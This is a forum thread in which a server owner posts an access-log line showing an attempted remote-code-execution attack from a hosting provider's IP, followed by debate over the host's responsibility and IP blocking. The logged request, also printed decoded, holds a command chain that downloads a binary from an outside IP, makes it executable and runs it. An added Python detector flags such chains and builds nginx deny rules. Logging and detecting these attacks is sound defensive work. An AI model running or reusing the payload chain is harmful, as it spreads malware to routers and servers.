Attack is coming to my server from AlexHost
Log from my server:
91.208.184.113 - - [19/Jun/2025:15:35:57 +0200] "POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20arm7%3B%20wget%20http%3A%2F%2F193.32.162.74%2Fbins%2Farm7%3B%20chmod%20777%20arm7%3B%20.%2Farm7%20routers HTTP/1.1" 404 257
Conclusion:
This is an attack aimed at loading and executing a malicious binary on the server. Since the server responded with a 404, the attack failed via this path.
Attacker's IP address:
https://www.ip-tracker.org/lookup.php?ip=91.208.184.113
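As an added example (not part of the original post), a small detector for exactly the kind of line logged above: it URL-decodes the request target, flags the "fetch, chmod, execute" chain hidden in the query string, and turns the source IPs into nginx deny directives. The combined log format and the second, benign log line are constructed assumptions.

```python
# Added example for this thread (not from the original post): decode the request target
# of access-log lines, flag the "wget ...; chmod 777 ...; ./bin" chain, list IPs to deny.
import re
from urllib.parse import unquote

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+')
DOWNLOADER = re.compile(r'\b(wget|curl|tftp)\b')    # fetch stage of the chain
EXECUTE = re.compile(r'chmod\s+[0-7]{3,4}|\./\w+')  # make executable / run it

def decode_target(target):
    """URL-decode the request target until stable (bounded, undoes double encoding)."""
    for _ in range(3):
        nxt = unquote(target)
        if nxt == target:
            break
        target = nxt
    return target

def classify_line(line):
    """Parse one access-log line; None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m["target"])
    return {"ip": m["ip"], "status": int(m["status"]), "decoded": decoded,
            "suspicious": bool(DOWNLOADER.search(decoded) and EXECUTE.search(decoded))}

def blocklist(lines):
    """Source IPs that sent a download-and-run chain, deduplicated, in first-seen order."""
    ips = []
    for line in lines:
        r = classify_line(line)
        if r and r["suspicious"] and r["ip"] not in ips:
            ips.append(r["ip"])
    return ips

def nginx_deny(ips):
    """Render nginx `deny` directives for the flagged IPs."""
    return "\n".join(f"deny {ip};" for ip in ips)

# The line from the post, plus a constructed benign request for contrast.
SAMPLE_LOG = [
    '91.208.184.113 - - [19/Jun/2025:15:35:57 +0200] "POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX'
    '&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20arm7%3B%20wget%20http%3A%2F%2F193.32.162.74%2Fbins%2Farm7'
    '%3B%20chmod%20777%20arm7%3B%20.%2Farm7%20routers HTTP/1.1" 404 257',
    '198.51.100.7 - - [19/Jun/2025:15:36:01 +0200] "GET /index.html HTTP/1.1" 200 1024',
]
if __name__ == "__main__":
    print(nginx_deny(blocklist(SAMPLE_LOG)))  # deny 91.208.184.113;
```

The decoded target shows the payload in plain text (`cd /tmp;rm -rf arm7; wget http://193.32.162.74/bins/arm7; chmod 777 arm7; ./arm7 routers`), which is what the 404 in the raw log hides from a quick read.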
Comments
Slightly unrelated:
My prediction: AlexHost is gonna deadpool in a year or around for one reason or another. I know it will.
As for the topic, the bots using AlexHost are attempting RCE.
AlexHost has a habit of hosting habitual spammers and abusers. Here is a quick look:
https://www.abuseipdb.com/check-block/91.208.184.113/24
What reasons are those?
I've looked through some of the IPs. Not only do they have a lot of customers, but most of the sites hosted there seem legit and innocuous.
It's a shot in the dark. Can't say the reason yet, but I believe it will happen. For a similar reason to why Aeza and that other pq or some other hosting died.
Plus those IPs are also listed in some mail abuse blacklists. https://mxtoolbox.com/blacklists.aspx
I would like to hear about this @alexhost
One, IPs are recycled.
Two, boxes get pwned.
It most certainly has nothing to do with AH.
Just reach out, you'll get a new IP.
The IP address currently belongs to AlexHost... everything else you listed is irrelevant.
That is a strong prediction; any others you think would deadpool too?
AlexHost leases IPs from other brokers.
They generally do not own their IPs.
When they lease new IPs, they are oftentimes used by spammers, etc.
It takes time for them to get cleaned up.
Point is, it's not as simple as one would want to think.
You want to say that AH did not rent a server to someone who is trying to attack other servers.
Here you have more details:
https://myip.ms/info/whois/91.208.184.113
Those are just bots ig, nothing to worry about. You can block them at the firewall level or, if using nginx, just 444 them ig.
I'm sure they will take action against the user if you reported it to them. You did report it to them, right?
That is NOT to say that:
1. SOME IPs are IN FACT abused by AH clients.
Regardless, in this case, it's absolute nonsense to blame AH for this.
It's just how the world works.
One time an IP is leased by one company, another... well, a completely different one. Some abuse them to hell, some not. It's up to the new company to clean it up.
I'm reporting it here too. @alexhost
I know all that, of course it's a bot, but you have to know that someone installed the bot and started the bot.
Regarding the firewall, it is set to automatically block such things, blacklisting the IP.
I don't know, but before buying an IP address, I would also check what I'm buying, how much of it is contaminated. That's pure logic, isn't it?
Absolutely, brother...
In that case:
So you are in somewhat of a pickle... One thing you can do is to simply go to bgp.tools, look up all of their ranges through Spamhaus (SBL), and see if they are SBL'd or not.
If not, you're gucci.
If not, well, move on, I suppose... Some people that keep a clean network are @Clouvider, if I remember correctly. Otherwise, you pretty much have to use mainstream costs, or someone like SpectraIP.. if he can hook you up with /29 from a clean /24? If I remember correctly, you are good with Spectra.
the internet is scary, randos always touching you
Here you have the answer:
https://bgp.tools/prefix/91.208.184.0/24
Registered on: 7 Nov 2019 (5 years old)
Registered to: md.alexhost (ripe)
Enough with the smart ones!
So... what's the problem? Ask for a different IP? Different /24? Some people...
No problem, read the beginning of this post.
This is just information, and I want to hear AH's comment.
Best regards!
If something like this always happens when we use a cheap plan, then what is the need to use LET providers?
block the IP and that's it
Do you think they don't have smarter work to do than commenting on a compromised server?
I get 1000s of them daily from OVH, Hetzner, Leaseweb, all over the place.
Someone rented an AlexHost VPS and is scanning the whole world for vulnerable routers, OVH, Hetzner, Azure and everyone on this planet gets abused by those people, it's not an AlexHost thingy at all.
Best you can do is report the AlexHost IP, but you will still have 1000 other IPs from all over the world scanning and trying out automated scripts that try to hack your server.
Ah, need some sleep
Yeah, good luck with that... Day I am going to block any AS or ranges is the day I am going to quit the Internets, haha.
Yeah exactly, it's a pointless thing, just run fail2ban/crowdsec and auto block those IPs or leave the Internet or don't give a fuck.
Just block 0.0.0.0/0 and ::/0 in your firewall, it's even simpler, doesn't require installing anything extra (assuming you have a firewall installed). I was able to block a large number of malicious traffic with this one simple trick.
That's life.
I meet such visits from all over the world everyday, most of which come from China, US, Brazil.
sue them
https://www.abuseipdb.com/check-block/91.208.184.113/24
That's a pretty impressive percentage of customers that happen to be abusers, without any knowledge of the host of course..... Imagine what would happen businesswise if they reacted to abuse reports...
hmm, normal
that is the internet, secure your web apps and ports